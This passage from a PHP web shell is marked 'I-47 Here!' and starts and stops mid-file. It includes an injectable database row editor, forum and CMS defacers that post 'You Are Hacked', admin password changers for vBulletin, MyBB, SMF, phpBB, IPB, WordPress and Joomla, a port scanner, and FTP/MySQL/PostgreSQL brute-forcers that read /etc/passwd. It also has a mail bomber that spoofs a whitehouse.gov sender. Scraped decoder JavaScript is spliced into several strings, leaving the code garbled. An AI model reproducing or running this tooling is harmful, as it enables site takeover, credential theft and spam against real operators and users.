2934                                         echo "<th>Function</th>
2935 ";
2936                                         echo "<th>Data</th>
2937 ";
2938                                         echo "</tr>
2939 ";
2940                                         $pResult = mysql_db_query($dbname, "SHOW fields FROM $tablename");
2941                                         $num = mysql_num_rows($pResult);
2942                                         $pResultLen = mysql_list_fields($dbname, $tablename);
2943                                         for ($i = 0;$i < $num;$i++) {
2944                                             $field = mysql_fetch_array($pResult);
2945                                             $fieldname = $field["Field"];
2946                                             $fieldtype = $field["Type"];
2947                                             $len = mysql_field_len($pResultLen, $i);
2948                                             echo "<tr>";
2949                                             echo "<td>$fieldname</td>";
2950                                             echo "<td>" . $field["Type"] . "</td>";
2951                                             echo "<td>
2952 ";
2953                                             echo "<select name=${fieldname}_function class=sbox>
2954 ";
2955                                             echo "<option>
2956 ";
2957                                             echo "<option>ASCII
2958 ";
2959                                             echo "<option>CHAR
2960 ";
2961                                             echo "<option>SOUNDEX
2962 ";
2963                                             echo "<option>CURDATE
2964 ";
2965                                             echo "<option>CURTIME
2966 ";
2967                                             echo "<option>FROM_DAYS
2968 ";
2969                                             echo "<option>FROM_UNIXTIME
2970 ";
2971                                             echo "<option>NOW
2972 ";
2973                                             echo "<option>PASSWORD
2974 ";
2975                                             echo "<option>PERIOD_ADD
2976 ";
2977                                             echo "<option>PERIOD_DIFF
2978 ";
2979                                             echo "<option>TO_DAYS
2980 ";
2981                                             echo "<option>USER
2982 ";
2983                                             echo "<option>WEEKDAY
2984 ";
2985                                             echo "<option>RAND
2986 ";
2987                                             echo "</select>
2988 ";
2989                                             echo "</td>
2990 ";
2991                                             $value = htmlspecialchars($data[$i]);
2992                                             $type = strtok($fieldtype, " (,)
2993 ");
2994                                             if ($type == "enum" || $type == "set") {
2995                                                 echo "<td>
2996 ";
2997                                                 if ($type == "enum") echo "<select name=$fieldname class=box>
2998 ";
2999                                                 else if ($type == "set") echo "<select name=$fieldname size=4 class=box multiple>
3000 ";
3001                                                 while ($str = strtok("'")) {
3002                                                     if ($value == $str) echo "<option selected>$str
3003 ";
3004                                                     else echo "<option>$str
3005 ";
3006                                                     strtok("'");
3007                                                 }
3008                                                 echo "</select>
3009 ";
3010                                                 echo "</td>
3011 ";
3012                                             } else {
3013                                                 if ($len < 40) echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\" class=box></td>
3014 ";
3015                                                 else echo "<td><textarea cols=47 rows=3 maxlength=$len name=$fieldname class=box>$value</textarea>
3016 ";
3017                                             }
3018                                             echo "</tr>";
3019                                         }
3020                                         echo "</table><p>
3021 ";
3022                                         echo "<input type=submit value='Edit Data' class=but>
3023 ";
3024                                         echo "<input type=button value='Cancel' onClick='history.back()' class=but>
3025 ";
3026                                         echo "</form>
3027 ";
3028                                     }
3029                                 }
3030                                 // Edit Submit Table Data
3031                                 else if ($_REQUEST['action'] == "editsubmitData") {
3032                                     $dbserver = $_COOKIE["dbserver"];
3033                                     $dbuser = $_COOKIE["dbuser"];
3034                                     $dbpass = $_COOKIE["dbpass"];
3035                                     $dbname = $_POST['dbname'];
3036                                     $tablename = $_POST['tablename'];
3037                                     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
3038                                     mysql_select_db($dbname);
3039                                     $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
3040                                     $row = mysql_fetch_array($sql);
3041                                     $row = $row['COLUMN_NAME'];
3042                                     $rowid = $_POST[$row];
3043                                     $pResult = mysql_db_query($dbname, "SHOW fields FROM $tablename");
3044                                     $num = mysql_num_rows($pResult);
3045                                     $rowcount = $num;
3046                                     $pResultLen = mysql_list_fields($dbname, $tablename);
3047                                     for ($i = 0;$i < $num;$i++) {
3048                                         $field = mysql_fetch_array($pResult);
3049                                         $fieldname = $field["Field"];
3050                                         $arrdata = $_REQUEST[$fieldname];
3051                                         $str.= " " . $fieldname . " = '" . $arrdata . "'";
3052                                         $rowcount--;
3053                                         if ($rowcount != 0) $str.= ",";
3054                                     }
3055                                     $str = "update $tablename set" . $str . " where $row=$rowid";
3056                                     mysql_query($str);
3057                                     header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
3058                                 } else if (isset($_GET['logoutdb'])) {
3059                                     setcookie("dbserver", time() - 60 * 60);
3060                                     setcookie("dbuser", time() - 60 * 60);
3061                                     setcookie("dbpass", time() - 60 * 60);
3062                                     header("Location:$self?database");
3063                                 }
3064                                 // Forum Manager
3065                                 else if (isset($_GET["forum"])) { ?>
3066       <center><table><tr><td><a href="<?php echo $self; ?>?forum&defaceforum"><font color="lime" size="4">| Forum Defacer |</font></a></td>
3067        <td><a href="<?php echo $self; ?>?forum&passwordchange"><font color="lime" size="4">| Forum Password Changer |</font></a></td>
3068        </tr></table></center><br>
3069        <?php
3070                                     if (isset($_GET["defaceforum"])) {
3071 ?>
3072        <center>
3073            <font color="#FF0000" size="4">Vbulletin Forum Index Changer</font>
3074            <form action="<?php echo $self; ?>" method = "POST">
3075            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3076                <tr>
3077                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3078                <p>
3079                    Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3080                </p>
3081                </tr>
3082                <tr>
3083                    <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack VB" name="forumdeface"></td>
3084                </tr>
3085            </table>
3086            </form>
3087            
3088            <font color="#FF0000" size="4">MyBB Forum Index Changer</font>
3089            <form action="<?php echo $self; ?>" method = "POST">
3090            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3091                <tr>
3092                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3093                    <p>
3094                        Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3095                    </p>  
3096                    </td>
3097                </tr>
3098                <tr>
3099                    <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack MyBB" name="forumdeface"></td>
3100                </tr>
3101            </table>
3102            </form>
3103            
3104            <font color="#FF0000" size="4">SMF Forum Index Changer</font>
3105            <form action="<?php echo $self; ?>" method = "POST">
3106            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3107                <tr>
3108                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3109                    <p>
3110                        Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3111                    </p>
3112                    </td>
3113                </tr>
3114                <tr>
3115                    <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack SMF" name="forumdeface"></p></td>
3116                    
3117                </tr>
3118            </table>
3119            </form>
3120            
3121            <font color="#FF0000" size="4">IPB Forum Index Changer</font>
3122            <form action="<?php echo $self; ?>" method = "POST">
3123            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3124                <tr>
3125                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td>
3126                </tr>
3127                <tr>
3128                    <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack IPB" name="forumdeface"></td>
3129                </tr>
3130            </table>
3131            </form>       
3132            
3133            <font color="#FF0000" size="4">Wordpress Index Changer</font>
3134            <form action="<?php echo $self; ?>" method = "POST">
3135            <table border = "1" width="50%" height="316" style="text-align: center" align="center"> 
3136                <tr>
3137                    <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3138                    <p>
3139                        Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3140                    </p>
3141                    </td>
3142                </tr>
3143                <tr>
3144                    <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack wordpress" name="forumdeface"></p></td>
3145                    
3146                </tr>
3147            </table>
3148            </form>
3149        </center> 
3150    <?php
3151                                     } else if (isset($_GET["passwordchange"])) {
3152                                         echo "<center>";
3153                                         if (isset($_GET['changed'])) { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php
3154                                         } else if (isset($_GET['cannotchange'])) { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php
3155                                         } ?>
3156            
3157            <font color="#FF0000" size="4">Vbulletin Forum Password Changer</font>
3158            <form action="<?php echo $self; ?>" method = "POST">
3159            <input type="hidden"  name="forums" value="vb">
3160            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3161                <tr>
3162                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3163                <p>
3164                    Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3165                </p>
3166                </tr>
3167                <tr>
3168                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3169                </tr>
3170            </table>
3171            </form>
3172            
3173            <font color="#FF0000" size="4">MyBB Forum Password Changer</font>
3174            <form action="<?php echo $self; ?>" method = "POST" name="mybb">
3175            <input type="hidden"  name="forums" value="mybb">
3176            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3177                <tr>
3178                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3179                <p>
3180                    Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3181                </p>
3182                </tr>
3183                <tr>
3184                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3185                </tr>
3186            </table>
3187            </form>
3188            
3189            <font color="#FF0000" size="4">SMF Forum Password Changer</font>
3190            <form action="<?php echo $self; ?>" method = "POST" name="smf">
3191            <input type="hidden"  name="forums" value="smf">
3192            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3193                <tr>
3194                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3195                <p>
3196                    Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3197                </p>
3198                </tr>
3199                <tr>
3200                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3201                </tr>
3202            </table>
3203            </form>
3204            
3205            <font color="#FF0000" size="4">Phpbb Forum Password Changer</font>
3206            <form action="<?php echo $self; ?>" method = "POST">
3207            <input type="hidden"  name="forums" value="phpbb">
3208            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3209                <tr>
3210                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3211                <p>
3212                    Table Prefix : <input type="text" name="prefix" value="phpbb_" class="sbox"> (Optional)</td>
3213                </p>
3214                </tr>
3215                <tr>
3216                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3217                </tr>
3218            </table>
3219            </form>
3220            
3221            <font color="#FF0000" size="4">IPB Forum Password Changer</font>
3222            <form action="<?php echo $self; ?>" method = "POST" name="ipb">
3223            <input type="hidden"  name="forums" value="ipb">
3224            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3225                <tr>
3226                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3227                <p>
3228                    Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3229                </p>
3230                </tr>
3231                <tr>
3232                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3233                </tr>
3234            </table>
3235            </form>       
3236            
3237            <a name="wordp" id="wordp">
3238            <font color="#FF0000" size="4">Wordpress Password Changer</font>
3239            <form action="<?php echo $self; ?>" method = "POST" name="wp">
3240            <input type="hidden"  name="forums" value="wp">
3241            <a name="wordp" id="wordp">
3242            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3243                <tr>
3244                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3245                <p>
3246                    Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3247                </p>
3248                </tr>
3249                <tr>
3250                    <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"></p><p><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3251                </tr>
3252            </table>
3253            </form>
3254            
3255            <div name="jooml" id="jooml">
3256            <font color="#FF0000" size="4">Joomla Password Changer</font>
3257            <form action="<?php echo $self; ?>" method = "POST">
3258            <input type="hidden"  name="forums" value="joomla">
3259            <table border = "1" width="50%" height="246" style="text-align: center" align="center"> 
3260                <tr>
3261                    <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b>  DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3262                <p>
3263                    Table Prefix : <input type="text" name="prefix" value="jos_" class="sbox"> (Optional)</td>
3264                </p>
3265                </tr>
3266                <tr>
3267                    <td height="70" width="780"><p align="center"><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3268                </tr>
3269            </table>
3270            </form>
3271            <?php
3272                                         if (isset($_GET['changed'])) { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php
3273                                         } else if (isset($_GET['cannotchange'])) { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php
3274                                         } ?>
3275        </center> 
3276            <?php
3277                                     }
3278                                 }
3279                                 // Mail
3280                                 else if (isset($_GET['tools'])) {
3281 ?>
3282        <center>
3283        <table cellpadding="5" border="2" style="width:50%;">
3284            <tr>
3285                <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3286            </tr>
3287            <tr>
3288                <td align="center">
3289                <form name='scanner' method='post'>
3290                <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3291                </td>
3292                <td align="center">
3293                <select class="sbox" name='protocol'>
3294                    <option value='tcp'>tcp</option>
3295                    <option value='udp'>udp</option>
3296                </select>
3297                </td>
3298            <tr>
3299                <td colspan="2" align="center"><input class="but" type='submit' value='Scan Ports'></td>
3300            </tr>
3301            </form>
3302            
3303        <?php
3304                                     if (isset($_POST['host']) && isset($_POST['protocol'])) {
3305                                         echo "<tr><td colspan=2><font size='3' face='Verdana'>Open Ports: ";
3306                                         $host = $_POST['host'];
3307                                         $proto = $_POST['protocol'];
3308                                         $myports = array("21", "22", "23", "25", "59", "80", "113", "135", "445", "1025", "5000", "5900", "6660", "6661", "6662", "6663", "6665", "6666", "6667", "6668", "6669", "7000", "8080", "8018");
3309                                         for ($current = 0;$current <= 23;$current++) {
3310                                             $currents = $myports[$current];
3311                                             $service = getservbyport($currents, $proto);
3312                                             // Try to connect to port
3313                                             $result = fsockopen($host, $currents, $errno, $errstr, 1);
3314                                             // Show results
3315                                             if ($result) {
3316                                                 echo "<font color=lime size=3>$currents, </font>";
3317                                             }
3318                                         }
3319                                     }
3320                                     echo "</td></tr></table>";
3321 ?>
3322        <br>
3323        <form action="<?php echo $self; ?>" method="get">
3324        <input type="hidden" name="tools">
3325        <table cellpadding="5" border="2" style="width:50%;">
3326            <tr>
3327                <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3328            </tr>
3329            <tr>
3330                <td>Type : </td>
3331                <td>
3332                    <select name="prototype" class="sbox">
3333                        <option value="ftp">FTP</option>
3334                        <option value="mysql">MYSQL</option>
3335                        <option value="postgresql">PostgreSql</option>
3336                    </select>
3337                </td>
3338            </tr>
3339            <tr>
3340                <td>Server <b>:</b> Port : </td>
3341                <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3342            </tr>
3343            <tr>
3344                <td valign="middle">Brute type : </td>
3345                <td><label><input type=radio name=type value="1" checked> /etc/passwd</label><label><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label><hr>
3346                <input type=radio name=type value="2"> Dictionary</label><br>
3347                Login : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="login" value="root" class="sbox"><br>
3348                Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3349                </td>
3350            </tr>
3351            <tr>
3352                <td colspan="2" align="center"><input type="submit" value="Attack >>" class="but"></td>
3353            </tr>
3354            </form>
3355            
3356        <?php
3357                                     if (isset($_GET['prototype'])) {
3358                                         echo '<tr><td colspan=2><h1>Results</h1><div><span>Type:</span> ' . htmlspecialchars($_GET['prototype']) . ' <span><br>Server:</span> ' . htmlspecialchars($_GET['serverport']) . '<br>';
3359                                         if ($_GET['prototype'] == 'ftp') {
3360                                             function BruteFun($ip, $port, $login, $pass) {
3361                                                 $fp = @ftp_connect($ip, $port ? $port : 21);
3362                                                 if (!$fp) return false;
3363                                                 $res = @ftp_login($fp, $login, $pass);
3364                                                 @ftp_close($fp);
3365                                                 return $res;
3366                                             }
3367                                         } elseif ($_GET['prototype'] == 'mysql') {
3368                                             function BruteFun($ip, $port, $login, $pass) {
3369                                                 $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
3370                                                 @mysql_close($res);
3371                                                 return $res;
3372                                             }
3373                                         } elseif ($_GET['prototype'] == 'pgsql') {
3374                                             function BruteFun($ip, $port, $login, $pass) {
3375                                                 $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
3376                                                 $res = @pg_connect($str);
3377                                                 @pg_close($res);
3378                                                 return $res;
3379                                             }
3380                                         }
3381                                         $success = 0;
3382                                         $attempts = 0;
3383                                         $server = explode(":", $_GET['server']);
3384                                         if ($_GET['type'] == 1) {
3385                                             $temp = @file('/etc/passwd');
3386                                             if (is_array($temp)) foreach ($temp as $line) {
3387                                                 $line = explode(":", $line);
3388                                                 ++$attempts;
3389                                                 if (BruteFun(@$server[0], @$server[1], $line[0], $line[0])) {
3390                                                     $success++;
3391                                                     echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
3392                                                 }
3393                                                 if (@$_GET['reverse']) {
3394                                                     $tmp = "";
3395                                                     for ($i = strlen($line[0]) - 1;$i >= 0;--$i) $tmp.= $line[0][$i];
3396                                                     ++$attempts;
3397                                                     if (BruteFun(@$server[0], @$server[1], $line[0], $tmp)) {
3398                                                         $success++;
3399                                                         echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
3400                                                     }
3401                                                 }
3402                                             }
3403                                         } elseif ($_GET['type'] == 2) {
3404                                             $temp = @file($_GET['dict']);
3405                                             if (is_array($temp)) foreach ($temp as $line) {
3406                                                 $line = trim($line);
3407                                                 ++$attempts;
3408                                                 if (BruteFun($server[0], @$server[1], $_GET['login'], $line)) {
3409                                                     $success++;
3410                                                     echo '<b>' . htmlspecialchars($_GET['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
3411                                                 }
3412                                             }
3413                                         }
3414                                         echo "<span>Attempts:</span> <font color=lime>$attempts</font> <span>Success:</span> <font color=lime>$success</font></div></td></tr>";
3415                                     }
3416 ?>
3417        
3418        </table>
3419        </center><br>
3420        <?php
3421                                 }
3422                                 // Mail
3423                                 else if (isset($_GET['mailbomb'])) { ?>
3424    <center><table><tr><td><a href="<?php echo $self; ?>?bomb&mailbomb"><font color="lime" size="4">| Mail Bomber |</font></a></td><td><a href="<?php echo $self; ?>?mail&mailbomb"><font color="lime" size="4">| Mass Mailer |</font></a></td></tr></table></center><br>
3425 <?php
3426                                     if (isset($_GET['bomb'])) {
3427                                         if (isset($_GET['to']) && isset($_GET['subject']) && isset($_GET['message']) && isset($_GET['times']) && $_GET['to'] != '' && $_GET['subject'] != '' && $_GET['message'] != '' && $_GET['times'] != '') {
3428                                             $times = $_GET['times'];
3429                                             while ($times--) {
3430                                                 if (isset($_GET['padding'])) {
3431                                                     $fromPadd = rand(0, 9999);
3432                                                     $subjectPadd = " -- ID : " . rand(0, 9999999);
3433                                                     $messagePadd = "
3434 
3435 ------------------------------
3436 " . rand(0, 99999999);
3437                                                 }
3438                                                 $from = "president$fromPadd@whitehouse.gov
3439 /* <![CDATA[ */
3440 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3441 /* ]]> */
3442 ";
3443                                                 if (!mail($_GET['to'], $_GET['subject'] . $subjectPadd, $_GET['message'] . $messagePadd, "From:" . $from)) {
3444                                                     $error = 1;
3445                                                     echo "<center><font color=red size=3><blink><blink>Some Error Occured!</blink></font></center>";
3446                                                     break;
3447                                                 }
3448                                             }
3449                                             if ($error != 1) {
3450                                                 echo "<center><font color=lime size=3><blink>Mail(s) Sent!</blink></font></center>";
3451                                             }
3452                                         } else {
3453 ?>
3454            <form method="GET">
3455                <input type="hidden" name="bomb" />
3456                <input type="hidden" name="mailbomb" />
3457                <table id="margins" style="width:100%;">
3458                    <tr>
3459                        <td style="width:30%;">
3460                            To 
3461                        </td>
3462                        <td>
3463                            <input class="box" name="to" value="victim@domain.com
3464 /* <![CDATA[ */
3465 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3466 /* ]]> */
3467 ,victim2@domain.com
3468 /* <![CDATA[ */
3469 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3470 /* ]]> */
3471 " onFocus="if(this.value == 'victim@domain.com
3472 /* <![CDATA[ */
3473 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3474 /* ]]> */
3475 ,victim2@domain.com
3476 /* <![CDATA[ */
3477 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3478 /* ]]> */
3479 ')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com
3480 /* <![CDATA[ */
3481 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3482 /* ]]> */
3483 ,victim2@domain.com
3484 /* <![CDATA[ */
3485 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3486 /* ]]> */
3487 ';"/>
3488                        </td>
3489                    </tr>
3490                    
3491                    <tr>
3492                        <td style="width:30%;">
3493                            Subject
3494                        </td>
3495                        <td>
3496                            <input type="text" class="box" name="subject" value="I-47 Here!" onFocus="if(this.value == 'I-47 Here!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!';" />
3497                        </td>
3498                    </tr>
